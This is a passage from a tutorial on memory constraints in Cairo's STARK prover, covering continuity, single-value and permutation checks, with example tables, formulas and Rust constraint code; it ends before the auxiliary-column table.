&lt;p&gt;The hard part is figuring out how to transform these two conditions into equations, which can then be expressed as polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;Like any engineering problem, there are trade-offs: keeping the trace simple can make the constraints more complex, and using more straightforward constraints can require adding more information to the trace.&lt;&#x2F;p&gt;
&lt;p&gt;If we examine the conditions mentioned earlier, it becomes clear that validating them would be easier if the rows were sorted by address. For example, it’s challenging for a human to determine if a sequence like $(7, 5, 12, 4, 5, 11, 9, 10, 4, 4, 11, 7, 8)$ is continuous, but much more straightforward if we sort it: $(4, 4, 5, 5, 7, 7, 8, 9, 10, 11, 11, 12)$.&lt;&#x2F;p&gt;
&lt;p&gt;For this reason, Cairo’s VM adds two additional columns to the trace: the sorted versions of the address and value columns.&lt;&#x2F;p&gt;
&lt;p&gt;For example:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;address $(a)$&lt;&#x2F;th&gt;&lt;th&gt;value $(v)$&lt;&#x2F;th&gt;&lt;th&gt;sorted_address $(a’)$&lt;&#x2F;th&gt;&lt;th&gt;sorted_value $(v’)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;56&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;56&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;14&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;56&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;25&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;34&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;25&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;25&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;44&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;25&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;56&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;44&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;34&lt;&#x2F;td&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;14&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Although this duplicates the trace columns, it significantly simplifies verifying the continuity and read-only properties, as we’ll see next.&lt;&#x2F;p&gt;
&lt;p&gt;However, adding these two columns introduces a new challenge: We need a way to verify that the new columns are permutations of the original ones. We’ll handle this with &lt;strong&gt;Permutation Constraints&lt;&#x2F;strong&gt; (spoiler alert: this requires the prover to add another column to the trace).&lt;&#x2F;p&gt;
&lt;p&gt;Thus, by adding these new columns, validating the memory properties boils down to proving these simpler constraints:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Continuity Constraint**&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Single Value Constraint**&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Permutation Constraints**&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;constraints&quot;&gt;Constraints&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;continuity-constraint&quot;&gt;Continuity Constraint&lt;&#x2F;h3&gt;
&lt;p&gt;Our first constraint will ensure that memory addresses form a continuous range without gaps. For instance, if address 5 appears, addresses 4 and 6 must also appear to maintain continuity.&lt;&#x2F;p&gt;
&lt;p&gt;A valid example of continuous memory:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;sorted_addresses $(a’)$&lt;&#x2F;th&gt;&lt;th&gt;sorted_values $(v’)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;100&lt;&#x2F;td&gt;&lt;td&gt;42&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;101&lt;&#x2F;td&gt;&lt;td&gt;17&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;102&lt;&#x2F;td&gt;&lt;td&gt;35&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;103&lt;&#x2F;td&gt;&lt;td&gt;22&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;104&lt;&#x2F;td&gt;&lt;td&gt;88&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;An invalid example:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;sorted_addresses $(a’)$&lt;&#x2F;th&gt;&lt;th&gt;sorted_values $(v’)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;100&lt;&#x2F;td&gt;&lt;td&gt;42&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;101&lt;&#x2F;td&gt;&lt;td&gt;17&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;103&lt;&#x2F;td&gt;&lt;td&gt;22&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;104&lt;&#x2F;td&gt;&lt;td&gt;88&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Here, address 102 is missing, breaking continuity.&lt;&#x2F;p&gt;
&lt;p&gt;To check continuity, we examine the sorted address column, ensuring that the difference between consecutive addresses is always 0 (if they are the same) or 1 (if they are consecutive). The following Cairo constraint captures this:&lt;&#x2F;p&gt;
&lt;p&gt;$$(a_{i+1}^\prime - a_i^\prime )(a_{i+1}^\prime - a_i^\prime - 1) = 0 \text{ for all } i \in [0, n - 1)$$&lt;&#x2F;p&gt;
&lt;p&gt;Where $a_i^\prime$ represents the address in the $i$-th row of the sorted address column, and $v’_i$ represents the corresponding value.&lt;&#x2F;p&gt;
&lt;p&gt;In this equation:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The first factor, $(a&amp;#39;_{i+1} - a&amp;#39;_i)$ equals zero when addresses are the same.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The second factor, $(a&amp;#39;_{i+1} - a&amp;#39;_i - 1)$ equals zero when addresses differ by 1.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Since the product must equal zero, the addresses must be identical or differ by exactly 1, ensuring continuity.&lt;&#x2F;p&gt;
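&lt;p&gt;Before looking at the prover framework, the constraint can be checked directly on a sorted address column. A standalone sketch, with plain integers standing in for field elements:&lt;&#x2F;p&gt;

```rust
// Standalone check of the continuity constraint on a sorted address column:
// each consecutive pair must satisfy (a'_{i+1} - a'_i)·(a'_{i+1} - a'_i - 1) = 0,
// i.e. consecutive sorted addresses either repeat or increase by exactly one.
fn continuity_holds(sorted_addrs: &[i64]) -> bool {
    sorted_addrs.windows(2).all(|pair| {
        let d = pair[1] - pair[0];
        d * (d - 1) == 0
    })
}
```

&lt;p&gt;The sequence $(100, 101, 103, 104)$ from the invalid example fails this check at the pair $(101, 103)$, where the difference is $2$.&lt;&#x2F;p&gt;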
&lt;p&gt;Here’s how this is implemented in Rust:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn evaluate(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    frame: &amp;amp;Frame&amp;lt;F, F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_evaluations: &amp;amp;mut [FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    _periodic_values: &amp;amp;[FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    _rap_challenges: &amp;amp;[FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_evaluations&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .get_mut(self.constraint_idx())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|transition_eval| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let first_step = frame.get_evaluation_step(0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let second_step = frame.get_evaluation_step(1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let a_sorted_0 = first_step.get_main_evaluation_element(0, 2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let a_sorted_1 = second_step.get_main_evaluation_element(0, 2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let res = (a_sorted_1 - a_sorted_0)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                * (a_sorted_1 - a_sorted_0 - FieldElement::&amp;lt;F&amp;gt;::one());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *transition_eval = res;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        });&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;where:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let first_step = frame.get_evaluation_step(0); &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;gives us access to the first row of the trace and&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let a_sorted_0 = first_step.get_main_evaluation_element(0, 2); &#x2F;&#x2F;a&amp;#39;_0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;gives access to the third column (element 2, since columns are zero-indexed), which holds the sorted addresses.&lt;&#x2F;p&gt;
&lt;p&gt;Then the constraint evaluation looks like:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let res = (a_sorted_1 - a_sorted_0)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;* (a_sorted_1 - a_sorted_0 - FieldElement::&amp;lt;F&amp;gt;::one());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;*transition_eval = res;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;single-value-constraint&quot;&gt;Single-Value Constraint&lt;&#x2F;h3&gt;
&lt;p&gt;This constraint ensures that each memory address has a single, consistent value. Even if the same address is accessed multiple times, the value must always remain the same.&lt;br &#x2F;&gt;
A valid example:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Address&lt;&#x2F;th&gt;&lt;th&gt;Value&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;101&lt;&#x2F;td&gt;&lt;td&gt;17&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;101&lt;&#x2F;td&gt;&lt;td&gt;17&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;104&lt;&#x2F;td&gt;&lt;td&gt;88&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;An invalid example:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Address&lt;&#x2F;th&gt;&lt;th&gt;Value&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;101&lt;&#x2F;td&gt;&lt;td&gt;17&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;101&lt;&#x2F;td&gt;&lt;td&gt;42&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;102&lt;&#x2F;td&gt;&lt;td&gt;88&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;td&gt;…&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Here, address 101 has two different values, violating the constraint.&lt;&#x2F;p&gt;
&lt;p&gt;With logic analogous to the continuity constraint, the Cairo paper defines the single-value constraint as:&lt;&#x2F;p&gt;
&lt;p&gt;$$(v_{i+1}^\prime - v_i^\prime )(a_{i+1}^\prime - a_i^\prime - 1) = 0 \quad \text{for all } i \in {0, \ldots, n - 2}$$&lt;&#x2F;p&gt;
&lt;p&gt;In this equation:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;The first factor, $(v&amp;#39;_{i+1} - v&amp;#39;_i)$, forces the values at identical addresses to be equal.&lt;&#x2F;li&gt;
&lt;li&gt;The second factor, $(a&amp;#39;_{i+1} - a&amp;#39;_i - 1)$, vanishes when the addresses differ by 1, so the check only applies to identical addresses.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
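The pairwise check can be sketched in a few lines (plain integers; the helper name `single_value_holds` is ours). Note the check is only meaningful once continuity already holds, so consecutive address differences are 0 or 1:

```rust
// Evaluates the single-value constraint pairwise:
// (v'_{i+1} - v'_i) * (a'_{i+1} - a'_i - 1) == 0.
// When addresses are equal the second factor is -1, forcing equal values;
// when addresses differ by 1 the second factor is 0 and the check is vacuous.
fn single_value_holds(addrs: &[i64], vals: &[i64]) -> bool {
    addrs
        .windows(2)
        .zip(vals.windows(2))
        .all(|(a, v)| (v[1] - v[0]) * (a[1] - a[0] - 1) == 0)
}

fn main() {
    // Valid: address 101 always holds 17.
    assert!(single_value_holds(&[101, 101, 102], &[17, 17, 88]));
    // Invalid: address 101 holds both 17 and 42.
    assert!(!single_value_holds(&[101, 101, 102], &[17, 42, 88]));
    println!("single-value checks passed");
}
```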
&lt;p&gt;Here’s the implementation in Rust:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn evaluate(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    frame: &amp;amp;Frame&amp;lt;F, F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_evaluations: &amp;amp;mut [FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    _periodic_values: &amp;amp;[FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    _rap_challenges: &amp;amp;[FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_evaluations&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .get_mut(self.constraint_idx())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|transition_eval| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let first_step = frame.get_evaluation_step(0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let second_step = frame.get_evaluation_step(1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let a_sorted_0 = first_step.get_main_evaluation_element(0, 2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let a_sorted_1 = second_step.get_main_evaluation_element(0, 2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let v_sorted_0 = first_step.get_main_evaluation_element(0, 3);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let v_sorted_1 = second_step.get_main_evaluation_element(0, 3);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let res = (v_sorted_1 - v_sorted_0)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                * (a_sorted_1 - a_sorted_0 - FieldElement::&amp;lt;F&amp;gt;::one());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *transition_eval = res;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        });&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As with the continuity constraint, we extract the relevant rows and elements:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let a_sorted_0 = first_step.get_main_evaluation_element(0, 2); &#x2F;&#x2F; a&amp;#39;_i&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let a_sorted_1 = second_step.get_main_evaluation_element(0, 2); &#x2F;&#x2F; a&amp;#39;_{i+1}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let v_sorted_0 = first_step.get_main_evaluation_element(0, 3); &#x2F;&#x2F; v&amp;#39;_i&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let v_sorted_1 = second_step.get_main_evaluation_element(0, 3); &#x2F;&#x2F; v&amp;#39;_{i+1}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The evaluation results ensure that if two addresses are equal, their corresponding values are consistent.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;permutation-constraint&quot;&gt;Permutation Constraint&lt;&#x2F;h3&gt;
&lt;p&gt;Now that we know that $a’$ and $v’$ represent a continuous read-only memory, we must prove that $a’$ and $v’$ are a permutation of the original $a$ and $v$ columns. We’ll achieve this using an interactive protocol:&lt;&#x2F;p&gt;
&lt;p&gt;First, the verifier sends the prover two random field elements $z, \alpha \in \mathbb{F}$, known as &lt;em&gt;challenges&lt;&#x2F;em&gt;. One detail to remember is that if we work with a small field $\mathbb{F}$, these elements should be sampled from an extension field, so all the following permutation constraints will be over the extension.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;&#x2F;strong&gt; In practice, the protocol is not interactive; instead, the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Fiat%E2%80%93Shamir_heuristic&quot;&gt;Fiat-Shamir heuristic&lt;&#x2F;a&gt; is used to obtain random values, enabling a non-interactive approach.&lt;&#x2F;p&gt;
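As a rough illustration of the idea (not of the actual transcript used in any library, and emphatically not cryptographically secure, since it uses std's `DefaultHasher` instead of a cryptographic hash such as Keccak or Poseidon), challenges can be derived deterministically by hashing the prover's messages:

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

// Toy Fiat-Shamir sketch: both prover and verifier hash the transcript
// (here, a stand-in commitment to the trace) plus a domain-separation label,
// so they agree on the "random" challenges without any interaction.
fn derive_challenge(transcript: &[u8], label: &str) -> u64 {
    let mut h = DefaultHasher::new();
    transcript.hash(&mut h);
    label.hash(&mut h);
    h.finish()
}

fn main() {
    let commitment = b"merkle-root-of-trace"; // hypothetical transcript contents
    let z = derive_challenge(commitment, "z");
    let alpha = derive_challenge(commitment, "alpha");
    // Re-deriving from the same transcript gives the same challenge.
    assert_eq!(z, derive_challenge(commitment, "z"));
    assert_ne!(z, alpha);
    println!("derived challenges deterministically");
}
```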
&lt;p&gt;Second, using these challenges, the prover constructs an auxiliary column $p$, which is added to the trace table. This column is computed as:&lt;&#x2F;p&gt;
&lt;p&gt;$$\begin{aligned} p_0 &amp;amp;= \frac {z - (a_0 + \alpha v_0)} {z - (a’_0 + \alpha v’_0)}, \\ p_1 &amp;amp;= \frac {z - (a_0 + \alpha v_0)} {z - (a’_0 + \alpha v’_0)} \cdot \frac {z - (a_1 + \alpha v_1)} {z - (a’_1 + \alpha v’_1)} = p_0 \cdot \frac {z - (a_1 + \alpha v_1)} {z - (a’_1 + \alpha v’_1)}, \\ p_2 &amp;amp;= p_1 \cdot \frac {z - (a_2 + \alpha v_2)} {z - (a’_2 + \alpha v’_2)}. \end{aligned}$$&lt;&#x2F;p&gt;
&lt;p&gt;Continuing with this procedure we get:&lt;&#x2F;p&gt;
&lt;p&gt;$$p_{i+1} = p_i \cdot \frac {z - (a_{i+1} + \alpha v_{i+1})} {z - (a_{i+1}^\prime + \alpha v_{i+1}^\prime )} \text{ with } i \in {0, \ldots, n - 2}$$&lt;&#x2F;p&gt;
&lt;p&gt;For example, if the main trace table is:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$a$&lt;&#x2F;th&gt;&lt;th&gt;$v$&lt;&#x2F;th&gt;&lt;th&gt;$a’$&lt;&#x2F;th&gt;&lt;th&gt;$v’$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;then the table with the auxiliary column $p$ will look like this:&lt;&#x2F;p&gt;
